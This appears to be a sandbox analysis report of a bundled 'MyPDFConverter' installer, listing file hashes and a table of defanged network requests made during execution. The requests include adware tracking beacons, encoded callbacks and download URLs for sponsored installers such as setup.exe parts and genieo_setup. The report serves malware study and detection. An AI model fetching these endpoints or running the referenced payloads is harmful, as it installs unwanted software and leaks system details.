4d902dec4a5b50281707f4ae914f853b
6eaa9b54f455c4c0aebd26f847a4ef05
fa568de8c5815df8a0c6fec135476113
0883493675fa324944249a6c3c4aeb17
0924a97410f42990ad386b5bdb21f889
2bcd76f0a9b4b3151850d1db2761b68f
2ea994d2f286cd806e704ca7725c69b5
69279cea1d82594133ed3888ccdbf2e6
a1dd42f3bf738a74cfd93d9baf7e383d
f851beeaa9065db1ee91294fc5689b2c
74fc1165f17d69e1205b8624e8b5fbbe
Network Activity
URLs
URL | IP |
---|---|
hxxp://78.138.127.15/pinger?event_type=offer_accepted&installer_source=better_installer&software_type=sponsored&muid=96d78f35e7b7ea4fc32736d428df43b4&client_uid=4b5cb7aab8d80a4ba5daaec3cbcf46f0&uniqid=574d51bb688892ce2c77d046dcd15567&affiliate_id=mypdfconverterfr&software_id=mypdfconverterfr&sponsored_id=sourceapp_b2b&tokyo_csrf2_key=683d8b67bd80d41c0188be1c673a9a9e&tokyo_csrf2_timestamp=1422513658&slot_number=2&index_in_screen=1&index_in_session=2&0.4314217413277596 | |
hxxp://78.138.127.15/pinger?event_type=offer_shown&installer_source=better_installer&software_type=sponsored&muid=96d78f35e7b7ea4fc32736d428df43b4&client_uid=4b5cb7aab8d80a4ba5daaec3cbcf46f0&uniqid=574d51bb688892ce2c77d046dcd15567&affiliate_id=mypdfconverterfr&software_id=mypdfconverterfr&sponsored_id=appshat_madness&tokyo_csrf2_key=683d8b67bd80d41c0188be1c673a9a9e&tokyo_csrf2_timestamp=1422513658&slot_number=3&index_in_screen=1&index_in_session=3&display_height=90&0.8723355811491985 | |
hxxp://78.138.127.15/pinger?event_type=offer_accepted&installer_source=better_installer&software_type=sponsored&muid=96d78f35e7b7ea4fc32736d428df43b4&client_uid=4b5cb7aab8d80a4ba5daaec3cbcf46f0&uniqid=574d51bb688892ce2c77d046dcd15567&affiliate_id=mypdfconverterfr&software_id=mypdfconverterfr&sponsored_id=appshat_madness&tokyo_csrf2_key=683d8b67bd80d41c0188be1c673a9a9e&tokyo_csrf2_timestamp=1422513658&slot_number=3&index_in_screen=1&index_in_session=3&0.7870902808395388 | |
hxxp://78.138.127.15/pinger?event_type=offer_shown&installer_source=better_installer&software_type=sponsored&muid=96d78f35e7b7ea4fc32736d428df43b4&client_uid=4b5cb7aab8d80a4ba5daaec3cbcf46f0&uniqid=574d51bb688892ce2c77d046dcd15567&affiliate_id=mypdfconverterfr&software_id=mypdfconverterfr&sponsored_id=geneio_non_search_for_pc&tokyo_csrf2_key=683d8b67bd80d41c0188be1c673a9a9e&tokyo_csrf2_timestamp=1422513658&slot_number=4&index_in_screen=1&index_in_session=4&display_height=75&0.7763572020438432 | |
hxxp://78.138.127.15/pinger?event_type=offer_accepted&installer_source=better_installer&software_type=sponsored&muid=96d78f35e7b7ea4fc32736d428df43b4&client_uid=4b5cb7aab8d80a4ba5daaec3cbcf46f0&uniqid=574d51bb688892ce2c77d046dcd15567&affiliate_id=mypdfconverterfr&software_id=mypdfconverterfr&sponsored_id=geneio_non_search_for_pc&tokyo_csrf2_key=683d8b67bd80d41c0188be1c673a9a9e&tokyo_csrf2_timestamp=1422513658&slot_number=4&index_in_screen=1&index_in_session=4&0.7410277599261255 | |
hxxp://xa.xingcloud.com/v4/sof-installer/535559167_132775_B48A115F?action1=xa.geoip&action2=visit&action3=smt.visit.mystartsearch&update1=ref,smt&update2=identifier,installer&update3=version,6.3.76.1518&update4=nation,us&update5=language,en | 65.255.35.143 |
hxxp://78.138.127.15/pinger?event_type=install_start&installer_source=better_installer&software_type=sponsored&muid=96d78f35e7b7ea4fc32736d428df43b4&client_uid=4b5cb7aab8d80a4ba5daaec3cbcf46f0&uniqid=574d51bb688892ce2c77d046dcd15567&affiliate_id=mypdfconverterfr&software_id=mypdfconverterfr&sponsored_id=mystartsearch&tokyo_csrf2_key=683d8b67bd80d41c0188be1c673a9a9e&tokyo_csrf2_timestamp=1422513658&slot_number=1&index_in_screen=1&index_in_session=1&0.3823084710495085 | |
hxxp://www.inisxriy.com/infv3/index/2606/bnd/6.3.76.1518/7a9c839b08544f0d77986f6e82d16b3f | 50.23.120.53 |
hxxp://www.inisxriy.com/files/zip_r3/2606_ba3a47c5781b0c9bb6f586b6519791f6/1.zip | 50.23.120.53 |
hxxp://xa.xingcloud.com/v4/sof-installer/535559167_132775_B48A115F?action=smt.dlzip1.mystartsearch.finish,11 | 65.255.35.143 |
hxxp://xa.xingcloud.com/v4/sof-installer/535559167_132775_B48A115F?action=smt.installer.mystartsearch.hp | 65.255.35.143 |
hxxp://log.very911.com/install.gif?bundle=mystartsearch&ptid=smt&uid=535559167_132775_B48A115F | 184.173.191.224 |
hxxp://xa.xingcloud.com/v4/sof-installer/535559167_132775_B48A115F?action=smt.installer.mystartsearch.regok | 65.255.35.143 |
hxxp://xa.xingcloud.com/v4/sof-installer/535559167_132775_B48A115F?action=smt.installer.mystartsearch.ds | 65.255.35.143 |
hxxp://www.google.com/ | 173.194.113.212 |
hxxp://www.google.com.ua/?gfe_rd=cr&ei=W9bJVMMilK7zB9SFgLAN | 173.194.113.215 |
hxxp://xa.xingcloud.com/v4/sof-installer/535559167_132775_B48A115F?action=smt.installer.mystartsearch.nt.ff.tab | 65.255.35.143 |
hxxp://xa.xingcloud.com/v4/sof-installer/535559167_132775_B48A115F?action=smt.installer.mystartsearch.finish | 65.255.35.143 |
hxxp://www.inisxriy.com/infv3/index/2606/3rd/6.3.76.1518/37f90e7172ce364049fd177205bf4b1d | 50.23.120.53 |
hxxp://www.inisxriy.com/files/zip_r3/2606_ecd79b66f49d1d1c707187ca5bffb0b3/2.zip | 50.23.120.53 |
hxxp://xa.xingcloud.com/v4/sof-installer/535559167_132775_B48A115F?action=smt.installer.mystartsearch.ient | 65.255.35.143 |
hxxp://www.alchcz.cc/files/third/2015/01/16/172511/350/XTab_4.0.2.1716.exe | 50.97.209.234 |
hxxp://xa.xingcloud.com/v4/sof-installer/535559167_132775_B48A115F?action=smt.installer.mystartsearch.wpm | 65.255.35.143 |
hxxp://78.138.127.15/pinger?event_type=install_complete&installer_source=better_installer&software_type=sponsored&muid=96d78f35e7b7ea4fc32736d428df43b4&client_uid=4b5cb7aab8d80a4ba5daaec3cbcf46f0&uniqid=574d51bb688892ce2c77d046dcd15567&affiliate_id=mypdfconverterfr&software_id=mypdfconverterfr&sponsored_id=mystartsearch&tokyo_csrf2_key=683d8b67bd80d41c0188be1c673a9a9e&tokyo_csrf2_timestamp=1422513658&slot_number=1&index_in_screen=1&index_in_session=1&0.4327788826737436 | |
hxxp://78.138.127.15/pinger?event_type=install_start&installer_source=better_installer&software_type=sponsored&muid=96d78f35e7b7ea4fc32736d428df43b4&client_uid=4b5cb7aab8d80a4ba5daaec3cbcf46f0&uniqid=574d51bb688892ce2c77d046dcd15567&affiliate_id=mypdfconverterfr&software_id=mypdfconverterfr&sponsored_id=sourceapp_b2b&tokyo_csrf2_key=683d8b67bd80d41c0188be1c673a9a9e&tokyo_csrf2_timestamp=1422513658&slot_number=2&index_in_screen=1&index_in_session=2&0.20616356933149288 | |
hxxp://sourceapp.info/mg?alpha=Q2QKaQIuUEMZZzMfJUMNfC1Iegcddw5VQjhpV25cFmAnP0cAW10SbDcjFW5SaXMSSQ1GE3lvR10QRkdiQzNrYQJfZkBycmY7Gh5VKTclUw0BeAw4XlVhXwgCNQoINh5FNVZiBxYYCgJsQSYWb1Mfcg88fkMEPShNHD8bNFEXJys4eS1mQnAEGD0aZlU bnwGCgZ8GmUYWGJJQFxmBwl SB8OBw8M | |
hxxp://sourceapp.info/mg?alpha=Q2QKaQJ6JUg3MX9TJUMNQiBZZAJDIggYAkMPCyofMzRLCnQTGRcba0NUCx0lGnASNAgxEmxsNithXUcWUGwwZHc7MxYmCRNSQzZrVi9y | |
hxxp://sourceapp.info/mg?alpha=SVwbaBdSRnpqbQtkNEIYdhVZexIXcRo5YFIuSQ== | |
hxxp://sourceapp.info/fp?alpha=eidVXnZYX00SEgEPenR5e2MGU3Z6e0MvN10mFEEqfTNYXjB4VlVeHXtkSC4mO0QjDgtnVTxeRntTcgdiYnpfLAAcImE2cy0JQU1gX3MuU2k5JlYSKG0/AipzBElVHGN/cxRKcipdXCEafWBJRSQgNFgKCXtZO1gpZyEEAHYtMXdTZmliRgAlNn5FSydSNyswZGk7Qwh7fHMIMnMNWVFJdy1/GUt3P1pVOB5xdRtaN3U2QFleagU5SmY7LGRaPyoscBYQcHBEGi50JxwMelNkM0wQTC0BTX5hIAAjdwxPVx58LTVVRRR2BQF3Xzt1PQ1xc28EXkgUHThVN2ImBjh2OjdwCg1lJR9CdF9+RUZSDiBSLXJNPlISW2UhBD93DE9ebmgPcXs8By0dRA87ZQEI | |
hxxp://sourceapp.info/ii?alpha=eidVXnYRaD9QRktAenR5e2MGU3Z6e1l2e08UQU8zKHsfGTNvVjZ3XTo2HClnZicJTV84KG9RNmYgARxgfmwrVh4WJxVGdCltGhguR3ZMcyl4OhZePC91DSIACUpWHRx9a3w7di5GUS8aCng7LiIkLFh9eHpZPCpAZSd2AHYiNCRdFlIoFUJxLmVDWj0ELz0ydjo/Vw08OHdWUDRTRA5JIjwqVgomOQ8Afmo6Oi9VJiYvUBUDeFE7QjVgJAYDdigndiJfRyhyIWZ0OAcSY1MqRGkqbGQUTDZ8JAQ/JFUNQUMpOiNLRQ52CBd3WyczDUhAf28EVE05QTxMVCR+UlcjPCt2AFFINWlSYG0uARh6WXkzOmQ+JVIRLWoiATI1WQsRRTkpZkkZIHRLXzgZZmVfB2R6YA5cBw8PbABtJXkUGgUhK20LVARGUxM0fjhaTX1AKicmKjp7XkY8PWQNK3YQSFcefCEnBEhzJV5VIh1+b0tZLSYwWgwObAV/UVIbZlVANWNiTyNHRWdCUhZyOQceclo3QCAXS1gqH141YVsyAlkPDk8/aiNXG34uTR8lGV86FQdSeWM= | |
hxxp://sourceapp.info/if?alpha=fSMdXUFYdGp/eUZaMndOfGdOUEF9fxF1TEgQCUwEL39XGgRoUn50aj0yVCpQYSNBTmg/LCdSAWEkSR9XeWhjVSkRI11FQy5pUhsZQHIEcB5/Pl5dCyhxRSE3Dk4eHit6bzQ4QSlCGSwtDXxzLRUjKBB+T31ddCl3YiM+A0EtJWw+b0Z9AzgZdTtwAUhdQCxqB2xnDVFbZiVeZ0wJTR4aQ3tzX0lMNl0fKSt7YxcPRXdHWlcwJAA7H18+ZxkXAy0gEx9odSxeQVksYQJaFAE9ajVGPT4NW0g0WhdyTG4uCUAePzsBHklPBkN/cDgiHUsWJShKUXlrCjAZViMoMVgEOikiAmFXMTgYGXggTBsEBjMLcRxpalhPRDR4GX1RdV0PWQg5MRgUGjhVDS0xfn8GXRAgJVtdfzsMIAoTIXQfWkdyZmBDNwV+HB0WcigGLUpWfzJwGy8nflJEL3McMSJPHFtKHmJkHw1JLElDKW9yKBcKViw8GBQ8fVdlAlJsJUwLUnh8ZFs9ESBVQUYmeA9OQEUuDU4Ebn1OEA0NWw9wA15deUYfPzcQF1RLT35YTAZxdQJTeiVsXXskBiZVb29jDEJB | |
hxxp://78.138.127.15/pinger?event_type=install_fail&installer_source=better_installer&software_type=sponsored&muid=96d78f35e7b7ea4fc32736d428df43b4&client_uid=4b5cb7aab8d80a4ba5daaec3cbcf46f0&uniqid=574d51bb688892ce2c77d046dcd15567&affiliate_id=mypdfconverterfr&software_id=mypdfconverterfr&sponsored_id=sourceapp_b2b&tokyo_csrf2_key=683d8b67bd80d41c0188be1c673a9a9e&tokyo_csrf2_timestamp=1422513658&slot_number=2&index_in_screen=1&index_in_session=2&0.005616250394906319 | |
hxxp://78.138.127.15/pinger?event_type=install_start&installer_source=better_installer&software_type=sponsored&muid=96d78f35e7b7ea4fc32736d428df43b4&client_uid=4b5cb7aab8d80a4ba5daaec3cbcf46f0&uniqid=574d51bb688892ce2c77d046dcd15567&affiliate_id=mypdfconverterfr&software_id=mypdfconverterfr&sponsored_id=appshat_madness&tokyo_csrf2_key=683d8b67bd80d41c0188be1c673a9a9e&tokyo_csrf2_timestamp=1422513658&slot_number=3&index_in_screen=1&index_in_session=3&0.23028674511194408 | |
hxxp://cds.c5z6s5a3.hwcdn.net/smt2b/all/hat/row/setup.exe | |
hxxp://errors.crossrider.com/utility.gif?error=start&report=mini_s&ver=820&action=na&ms_vr=3&clock=0&rnd=8839 | 208.85.150.249 |
hxxp://errors.crossrider.com/utility.gif?report=fdata&f=3&c=820&i=10&n=ms_started&rnd=12312 | 208.85.150.249 |
hxxp://errors.crossrider.com/utility.gif?report=fdata&f=3&c=820&i=20&n=ms_start_download&rnd=24566 | 208.85.150.249 |
hxxp://cds.c5z6s5a3.hwcdn.net/smt2b/all/hat/row/setup.exe_c | |
hxxp://cds.c5z6s5a3.hwcdn.net/smt2b/all/hat/row/setup.exe_e | |
hxxp://cds.c5z6s5a3.hwcdn.net/smt2b/all/hat/row/setup.exe_d | |
hxxp://cds.c5z6s5a3.hwcdn.net/smt2b/all/hat/row/setup.exe_a | |
hxxp://cds.c5z6s5a3.hwcdn.net/smt2b/all/hat/row/setup.exe_b | |
hxxp://errors.crossrider.com/utility.gif?report=fdata&f=3&c=820&i=30&n=ms_download_success&rnd=20443 | 208.85.150.249 |
hxxp://xa.xingcloud.com/v4/searchprotect/535559167_132775_B48A115F?action=visit.heartbeat.smt&update0=ref,smt&update1=nation,us&update2=language,en&update3=version,4.0.1.1716 | 65.255.35.143 |
hxxp://errors.crossrider.com/utility.gif?report=fdata&f=3&c=820&i=35&n=ms_about_to_exc&rnd=9760 | 208.85.150.249 |
hxxp://errors.crossrider.com/utility.gif?error=mem_strt&report=mini_s&ver=820&action=na&ms_vr=3&clock=10817&rnd=3993 | 208.85.150.249 |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000820&i=100&n=init_start_funnel_step_name&rnd=1422513827 | |
hxxp://ipgeoapi.com/ | 54.235.151.26 |
hxxp://s3-website-us-east-1.amazonaws.com/installer.gif?action=started&app=65743&appver=0&ver=1_36_01_22&version_date=15-01-29&bic=AC5F59911E7B4F9F831F542369865C6AIE&verifier=705e42e0bb6c74a04369956d99485df5&upi=d5d8d8a61601751d467a5854a16ce35a&procid=0636C86E452B4A66857E1D1F9F48A1BAPI&srcid=000820&subid=0&zdata=appshatmadness&browser=ie&browserver=10&default=ie&chver=35.0.1916.153&ffver=29.0.1&iever=10.0.9200.16521&curtime=&country=ua&aver=X&xpiver=0_95&crxver=1_26_21&silent=1&os=7(64bit)&osbuild=7601&osprod=Windows 7 Professional N&ossp=Service Pack 1&osinstdt=1363796288&admin=1&type=85899350025&asw=0&asw2=1073750533&asw3=-2147483648&asw4=0&crtnm=ColoColoApps&procstarttime=1422513827&procruntime=4&rnd=1422513831 | |
hxxp://cds.c5z6s5a3.hwcdn.net/monetization.gif?event=3&ibic=AC5F59911E7B4F9F831F542369865C6AIE&verifier=705e42e0bb6c74a04369956d99485df5&campaign=000820&country=ua&app=65743&os=7(64bit)&defbro=ie&chver=35.0.1916.153&ffver=29.0.1&iever=10.0.9200.16521&starttime=1422513827&asw=0_1073750533_-2147483648_0&browser=ff,ie,de&rnd=1422513827 | |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000820&i=200&n=init_end_funnel_step_name&rnd=1422513832 | |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000820&i=300&n=deploy_start_funnel_step_name&rnd=1422513832 | |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000820&i=400&n=deploy_verifier_start_funnel_step_name&rnd=1422513835 | |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000820&i=500&n=deploy_notification_start_funnel_step_name&rnd=1422513835 | |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000820&i=600&n=deploy_omaha_start_funnel_step_name&rnd=1422513835 | |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000820&i=700&n=deploy_ch_start_funnel_step_name&rnd=1422513835 | |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000820&i=800&n=deploy_nova_start_funnel_step_name&rnd=1422513836 | |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000820&i=900&n=deploy_ff_start_funnel_step_name&rnd=1422513836 | |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000820&i=950&n=deploy_nova_ie_start_funnel_step_name&rnd=1422513842 | |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000820&i=1000&n=deploy_ie_start_funnel_step_name&rnd=1422513842 | |
hxxp://cds.c5z6s5a3.hwcdn.net/plugin/apps/65743/manifest/1_36_01_22/ie10/manifest.xml?ver=21&rnd=6562 | |
hxxp://s3-website-us-east-1.amazonaws.com/stats.gif?action=daily&app=65743&bic=AC5F59911E7B4F9F831F542369865C6AIE&verifier=705e42e0bb6c74a04369956d99485df5&ver=1_36_01_22&installtime=1422513827&os=7&browser=ie&browserver=10&ffver=29&chromever=35&srcid=000820&subid=0&zdata=appshatmadness&appver=21&bgver=1&pluginsver=17&curtime=1422513849&lifetime=22&rnd=6039 | |
hxxp://cds.c5z6s5a3.hwcdn.net/plugin/apps/65743/manifest/1_36_01_22/ie10/manifest.xml?ver=21&rnd=6787 | |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000820&i=1100&n=deploy_updater_start_funnel_step_name&rnd=1422513850 | |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000820&i=1200&n=deploy_watchdog_start_funnel_step_name&rnd=1422513853 | |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000820&i=10000&n=deploy_end_funnel_step_name&rnd=1422513853 | |
hxxp://a1621.g.akamai.net/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?52d20c74d0048ebb | |
hxxp://s3-website-us-east-1.amazonaws.com/installer.gif?action=finished&app=65743&appver=21&ver=1_36_01_22&version_date=15-01-29&bic=AC5F59911E7B4F9F831F542369865C6AIE&verifier=705e42e0bb6c74a04369956d99485df5&upi=d5d8d8a61601751d467a5854a16ce35a&procid=0636C86E452B4A66857E1D1F9F48A1BAPI&srcid=000820&subid=0&zdata=appshatmadness&browser=ie&browserver=10&default=ie&chver=35.0.1916.153&ffver=29.0.1&iever=10.0.9200.16521&curtime=&country=ua&aver=X&xpiver=0_95&crxver=1_26_21&silent=1&os=7(64bit)&osbuild=7601&osprod=Windows 7 Professional N&ossp=Service Pack 1&osinstdt=1363796288&admin=1&type=85899350025&asw=0&asw2=1073750533&asw3=-2147483648&asw4=0&crtnm=ColoColoApps&ieprofiles=1&chprofiles=na&ffprofiles=1&procstarttime=1422513827&procruntime=28&rnd=1422513855 | |
hxxp://a1363.dscg.akamai.net/pki/crl/products/microsoftrootcert.crl | |
hxxp://s3-website-us-east-1.amazonaws.com/apps.gif?action=install&app=65743&appver=21&ver=1_36_01_22&version_date=15-01-29&bic=AC5F59911E7B4F9F831F542369865C6AIE&verifier=705e42e0bb6c74a04369956d99485df5&upi=d5d8d8a61601751d467a5854a16ce35a&procid=0636C86E452B4A66857E1D1F9F48A1BAPI&srcid=000820&subid=0&zdata=appshatmadness&browser=ie&browserver=10&default=ie&chver=35.0.1916.153&ffver=29.0.1&iever=10.0.9200.16521&curtime=&country=ua&aver=X&installtime=1422513827&lifetime=0&silent=1&crtnm=ColoColoApps&procstarttime=1422513827&procruntime=28&rnd=1422513855 | |
hxxp://a1363.dscg.akamai.net/pki/crl/products/WinPCA.crl | |
hxxp://a1363.dscg.akamai.net/pki/crl/products/MicrosoftTimeStampPCA.crl | |
hxxp://cds.c5z6s5a3.hwcdn.net/monetization.gif?event=4&ibic=AC5F59911E7B4F9F831F542369865C6AIE&verifier=705e42e0bb6c74a04369956d99485df5&campaign=000820&country=ua&app=65743&os=7(64bit)&defbro=ie&chver=35.0.1916.153&ffver=29.0.1&iever=10.0.9200.16521&starttime=1422513827&asw=0_1073750533_-2147483648_0&browser=ff,ie,de&rnd=1422513827 | |
hxxp://errors.crossrider.com/utility.gif?error=done_mem_0&report=mini_s&ver=820&action=na&ms_vr=3&clock=43062&rnd=25839 | 208.85.150.249 |
hxxp://bigspeedpro.com/webplayer/appshat/config.json | |
hxxp://pagespeed.googlehosted.com/images/64x64.ico | |
hxxp://pagespeed.googlehosted.com/images/16x16.ico | |
hxxp://78.138.127.15/pinger?event_type=install_complete&installer_source=better_installer&software_type=sponsored&muid=96d78f35e7b7ea4fc32736d428df43b4&client_uid=4b5cb7aab8d80a4ba5daaec3cbcf46f0&uniqid=574d51bb688892ce2c77d046dcd15567&affiliate_id=mypdfconverterfr&software_id=mypdfconverterfr&sponsored_id=appshat_madness&tokyo_csrf2_key=683d8b67bd80d41c0188be1c673a9a9e&tokyo_csrf2_timestamp=1422513658&slot_number=3&index_in_screen=1&index_in_session=3&0.28958118764499907 | |
hxxp://pagespeed.googlehosted.com/home | |
hxxp://78.138.127.15/pinger?event_type=install_start&installer_source=better_installer&software_type=sponsored&muid=96d78f35e7b7ea4fc32736d428df43b4&client_uid=4b5cb7aab8d80a4ba5daaec3cbcf46f0&uniqid=574d51bb688892ce2c77d046dcd15567&affiliate_id=mypdfconverterfr&software_id=mypdfconverterfr&sponsored_id=geneio_non_search_for_pc&tokyo_csrf2_key=683d8b67bd80d41c0188be1c673a9a9e&tokyo_csrf2_timestamp=1422513658&slot_number=4&index_in_screen=1&index_in_session=4&0.6194686390575159 | |
hxxp://78.138.127.15/pinger?event_type=install_complete&installer_source=better_installer&software_type=sponsored&muid=96d78f35e7b7ea4fc32736d428df43b4&client_uid=4b5cb7aab8d80a4ba5daaec3cbcf46f0&uniqid=574d51bb688892ce2c77d046dcd15567&affiliate_id=mypdfconverterfr&software_id=mypdfconverterfr&sponsored_id=geneio_non_search_for_pc&tokyo_csrf2_key=683d8b67bd80d41c0188be1c673a9a9e&tokyo_csrf2_timestamp=1422513658&slot_number=4&index_in_screen=1&index_in_session=4&0.30974286226175074 | |
hxxp://ghs.l.google.com/track?uid={E8BFA998-168D-400E-B9E0-F41B76A5DFC7}&partner=gim394750002&data=updater_ping=&revision_core=0&revision_updater=0&revision_partner=0&os_version=Microsoft Windows 7 Professional Service Pack 1 (build 7601), 64-bit&java_version=1.6 | |
hxxp://s3-2-w.amazonaws.com/partner/gim394750002/release/live/partner_manifest.xml | |
hxxp://s3-2-w.amazonaws.com/partner/gim394750002/release/r16741/genieo_setup.gen | |
hxxp://app.mypdfconverter.com/gv/en/MyPDFConverter.msi | 178.33.88.173 |
hxxp://s3-2-w.amazonaws.com/core/release/r16741/updater_manifest.xml | |
hxxp://s3-2-w.amazonaws.com/core/release/r16741/manifest.xml | |
hxxp://s3-2-w.amazonaws.com/core/release/r16741/trayapp_setup.gen | |
hxxp://s3-2-w.amazonaws.com/core/release/r16741/framework_setup.gen | |
hxxp://e8218.ce.akamaiedge.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBS56bKHAoUD+Oyl+0LhPg9JxyQm4gQUf9Nlp8Ld7LvwMAnzQzn6Aq8zMTMCEFIA5aolVvwahu2WydRLM8c= | |
hxxp://e8218.ce.akamaiedge.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTSqZMG5M8TA9rdzkbCnNwuMAd5VgQUz5mp6nsm9EvJjo/X8AUm7+PSp50CEF1tL3zAt8MdpkWloaIHgTk= | |
hxxp://a1621.g.akamai.net/msdownload/update/v3/static/trustedr/en/authrootstl.cab?b77e166e5d8add6a | |
hxxp://app.mypdfconverter.com/step.php?campaign=14765&eme=×tamp=1422513667886947&tracker=1995&mso=5&mss=3&stepid=0&sk=75a8db4f27f64c106caf6dbe67de418c | 178.33.88.173 |
hxxp://a1363.dscg.akamai.net/pki/crl/products/MicCodSigPCA_08-31-2010.crl | |
hxxp://crl.globalsign.net/root.crl | 108.162.232.200 |
hxxp://crl.globalsign.net/gscodesigng2/MFMwUTBPME0wSzAJBgUrDgMCGgUABBRruLd2WRFk6cRYGFIqkQ4J8hxDogQUCG7YtpyKv+0+18N0XcyAH6gvUHoCEhEhR5HFQnItXEGJJ9zEpk51tw== | 108.162.232.200 |
hxxp://www.theviilage.com/searchprotect/up?ptid=smt&sid=IHProtectPlugin&ln=en_us&ver=4.0.1.1716&uid=535559167_132775_B48A115F&dp=0 | 208.43.69.149 |
hxxp://app.mypdfconverter.com/en/software/install/?campaign=14765&eme=×tamp=1422513667886947&tracker=1995&tk=ec3c2d87ece6905cc4d836b510070b07&mso=5&mss=3&sed=8&suid=FDcTF3M9j&download_country=en&ms=5&status=5&ms2=0&status2=0&ms3=0&status3=0&sms=0&itime=1422513882&ps=0&p_status=1 | 178.33.88.173 |
hxxp://app.mypdfconverter.com/en/software/pixel?campaign=14765&eme=×tamp=1422513667886947&tracker=1995&tk=ec3c2d87ece6905cc4d836b510070b07&mso=5&mss=3&sed=8&suid=FDcTF3M9j&download_country=en&ms=5&status=5&ms2=0&status2=0&ms3=0&status3=0&sms=0&itime=1422513882&ps=0&p_status=1&ua=Internet Explorer 10.0&sys=Windows 7&cookie=-1 | 178.33.88.173 |
hxxp://app.mypdfconverter.com/images/myPDFconverter.png | 178.33.88.173 |
hxxp://app.mypdfconverter.com/images/pixel.gif | 178.33.88.173 |
hxxp://pagead.l.doubleclick.net/pagead/conversion.js | |
hxxp://www-google-analytics.l.google.com/ga.js | |
hxxp://pagead.l.doubleclick.net/pagead/conversion/1003450607/?random=1422513975534&cv=7&fst=1422513975534&num=1&fmt=2&value=0&label=YJ0zCNGY5gEQ7-G93gM&bg=FFFFFF&hl=fr&guid=ON&u_h=902&u_w=1916&u_ah=858&u_aw=1916&u_cd=24&u_his=1&u_tz=120&u_java=true&u_nplug=0&u_nmime=0&frm=0&url=http://www.mypdfconverter.com/en/software/install/?campaign=14765&eme=×tamp=1422513667886947&tracker=1995&tk=ec3c2d87ece6905cc4d836b510070b07&mso=5&mss=3&sed=8&suid=FDcTF3M9j&download_country=en&ms=5&status=5&ms2=0&status2=0&ms3=0&status3=0&sms=0&itime=1422513882&ps=0&p_status=1&vis=1 | |
hxxp://app.mypdfconverter.com/images/congratsBg.jpg | 178.33.88.173 |
hxxp://www-google-analytics.l.google.com/r/__utm.gif?utmwv=5.6.2&utms=1&utmn=40022683&utmhn=www.mypdfconverter.com&utmcs=utf-8&utmsr=1916x902&utmvp=1173x539&utmsc=24-bit&utmul=en-us&utmje=1&utmfl=-&utmdt=Congratulations!&utmhid=1331959245&utmr=-&utmp=/0812929127/goal&utmht=1422513975626&utmac=UA-15433929-1&utmcc=__utma=14348971.1072120561.1422513976.1422513976.1422513976.1;+__utmz=14348971.1422513976.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);&utmjid=1198134741&utmredir=1&utmu=qACgAAAAAAAAAAAAAAAAAAAE~ | |
hxxp://shop.offerbox.com/eas?cu=23126;cre=img | 178.33.88.163 |
hxxp://www-google-analytics.l.google.com/r/__utm.gif?utmwv=5.6.2&utms=2&utmn=725233049&utmhn=www.mypdfconverter.com&utmcs=utf-8&utmsr=1916x902&utmvp=1173x539&utmsc=24-bit&utmul=en-us&utmje=1&utmfl=-&utmdt=Congratulations!&utmhid=1331959245&utmr=-&utmp=/en/software/install/?campaign=14765&eme=×tamp=1422513667886947&tracker=1995&tk=ec3c2d87ece6905cc4d836b510070b07&mso=5&mss=3&sed=8&suid=FDcTF3M9j&download_country=en&ms=5&status=5&ms2=0&status2=0&ms3=0&status3=0&sms=0&itime=1422513882&ps=0&p_status=1&utmht=1422513975648&utmac=UA-12585577-50&utmcc=__utma=14348971.1072120561.1422513976.1422513976.1422513976.1;+__utmz=14348971.1422513976.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);&utmjid=1037776761&utmredir=1&utmmt=1&utmu=rACgAAAAAAAAAAAAAAAAAAAE~ | |
hxxp://pagead.l.doubleclick.net/pagead/viewthroughconversion/1003450607/?random=251257950&cv=7&fst=1422513975534&num=1&fmt=2&value=0&label=YJ0zCNGY5gEQ7-G93gM&bg=FFFFFF&hl=fr&guid=ON&u_h=902&u_w=1916&u_ah=858&u_aw=1916&u_cd=24&u_his=1&u_tz=120&u_java=true&u_nplug=0&u_nmime=0&frm=0&url=http://www.mypdfconverter.com/en/software/install/?campaign=14765&eme=×tamp=1422513667886947&tracker=1995&tk=ec3c2d87ece6905cc4d836b510070b07&mso=5&mss=3&sed=8&suid=FDcTF3M9j&download_country=en&ms=5&status=5&ms2=0&status2=0&ms3=0&status3=0&sms=0&itime=1422513882&ps=0&p_status=1&vis=1&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=false&convclickts=0 | |
hxxp://shop.offerbox.com/pixel.gif | 178.33.88.163 |
hxxp://shop.offerbox.com/eas?cu=25386&eme=WBrHTc5N | 178.33.88.163 |
hxxp://shop.offerbox.com/eas?cu=5600;ty=pc | 178.33.88.163 |
